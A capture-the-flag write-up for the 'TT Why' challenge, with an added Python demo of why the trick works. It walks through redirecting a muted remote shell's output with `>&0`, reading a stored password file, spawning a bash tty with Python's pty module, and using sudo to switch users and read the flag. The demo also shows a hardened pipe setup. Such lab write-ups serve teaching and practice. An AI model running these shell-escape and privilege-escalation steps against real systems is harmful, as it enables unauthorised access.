# TTW

So, what a mess this was. Firstly, we started by performing a timing attack. That managed to get us quite a lot of things, but it was annoying having to wait 5 minutes for some results. So let's look for a better option.

Looking at the hint, it says to think about I/O. Hmmm, ok. Connecting through netcat, it prints out "Imagine having a usable terminal". Ok, interesting. If we try to enter a command, it doesn't output anything. Odd. We can probably assume that the output of all our commands is being sent to `/dev/null`, where it just gets wiped away.

What if we could trick the connection into redirecting our output somewhere else, instead of `/dev/null`? Just as `2>/dev/null` sends any errors to `/dev/null`, we can redirect our output to the input, since that is where we are connected, by appending `>&0`.

Once we've done some enumeration, we can use the name of the challenge, "TT Why" (sounding like TTY), to spawn a tty shell. From there we can run `sudo -l` (as password.txt has the problem-user password) to see that we can run `/usr/bin/chguser` as root. Changing user, navigating to the home folder, then to flag, we get flag.txt.

```
>ls -alR ./ >&0
message.txt
password.txt
```

```
> cat message.txt
Man, I just sure wish I could impersonate other_user
```

```
> cat password.txt
Password for problem user: 1234qwer
```

```
> python -c 'import pty; pty.spawn("/bin/bash")' >&0
```

```bash
$ sudo -l
(root) /usr/bin/chguser
```

```bash
$ sudo /usr/bin/chguser other-user
Password: 1234qwer
```

```bash
$ ls -alR 
./flag:
flag.txt
```

```bash
$ cat flag/flag.txt
```

## tjctf{ptys\_sure\_are\_neat}
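Why `>&0` works, as an added example that is not part of the original write-up: file descriptor 0 of the remote shell is the network socket itself, which is writable as well as readable, so output duplicated onto it travels back to the client even though stdout and stderr are `/dev/null`. The function name `run_muted_shell`, the `SAMPLE` input and the use of `socket.socketpair()` in place of the netcat connection are assumptions made for illustration; the pipe variant is an added contrast showing a service that hands the shell a read-only stdin.

```python
import os
import socket
import subprocess


def run_muted_shell(commands: str, stdin_is_socket: bool = True) -> bytes:
    """Feed `commands` to /bin/sh whose stdout and stderr are /dev/null.

    Returns every byte that comes back to the client end of the connection.
    """
    # socketpair() stands in for the netcat TCP connection: both are
    # bidirectional, so a descriptor opened on it can be read AND written.
    client, server = socket.socketpair()
    client.sendall(commands.encode())
    client.shutdown(socket.SHUT_WR)  # EOF after our commands so sh exits

    if stdin_is_socket:
        child_stdin = server.fileno()  # weak: fd 0 is the socket itself
    else:
        # hardened: relay the input into a one-way pipe; fd 0 is read-only
        child_stdin, pipe_w = os.pipe()
        while chunk := server.recv(4096):
            os.write(pipe_w, chunk)
        os.close(pipe_w)

    with open(os.devnull, "wb") as devnull:
        proc = subprocess.Popen(["/bin/sh"], stdin=child_stdin,
                                stdout=devnull, stderr=devnull)
        proc.wait()
    if not stdin_is_socket:
        os.close(child_stdin)
    server.close()  # last writer gone, so the client sees EOF

    received = b""
    while chunk := client.recv(4096):
        received += chunk
    client.close()
    return received


# Constructed input: one plain command and one using the write-up's >&0 trick.
SAMPLE = "echo hidden\necho visible >&0\n"

if __name__ == "__main__":
    print("socket as stdin:", run_muted_shell(SAMPLE))
    print("pipe as stdin:  ", run_muted_shell(SAMPLE, stdin_is_socket=False))
```

With the socket as stdin only the `>&0` line comes back; with the pipe, the write to fd 0 fails and nothing reaches the client.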

